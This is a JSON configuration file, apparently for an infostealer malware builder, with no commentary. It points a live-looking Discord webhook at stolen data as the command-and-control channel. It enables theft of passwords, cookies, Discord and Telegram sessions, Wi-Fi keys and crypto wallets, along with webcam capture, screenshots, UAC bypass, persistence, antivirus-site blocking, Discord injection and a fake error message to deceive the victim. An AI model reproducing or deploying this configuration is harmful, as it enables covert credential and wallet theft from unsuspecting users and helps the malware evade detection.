{
    "settings": {
        "c2": [
            0,
            "https://discord.com/api/webhooks/1249389426518528075/bGhdeDg6k8uBpF02AEcWzZnSoxNZhDTHAh-I5kGQmCZT80EGfnaKr0b6qwm5o5VQRC_6"
        ],
        "mutex": "PCnwd3xmLN6G4uWu",
        "pingme": true,
        "vmprotect": true,
        "startup": true,
        "melt": true,
        "uacBypass": true,
        "archivePassword": "getdunked",
        "consoleMode": 0,
        "debug": false,
        "pumpedStubSize": 685221347328,
        "boundFileRunOnStartup": false
    },
    "modules": {
        "captureWebcam": true,
        "capturePasswords": true,
        "captureCookies": true,
        "captureHistory": true,
        "captureAutofills": true,
        "captureDiscordTokens": true,
        "captureGames": true,
        "captureWifiPasswords": true,
        "captureSystemInfo": true,
        "captureScreenshot": true,
        "captureTelegramSession": true,
        "captureCommonFiles": true,
        "captureWallets": true,
        "fakeError": [
            true,
            [
                "ERROR",
                "No visual studio code detected",
                0
            ]
        ],
        "blockAvSites": true,
        "discordInjection": true
    }
}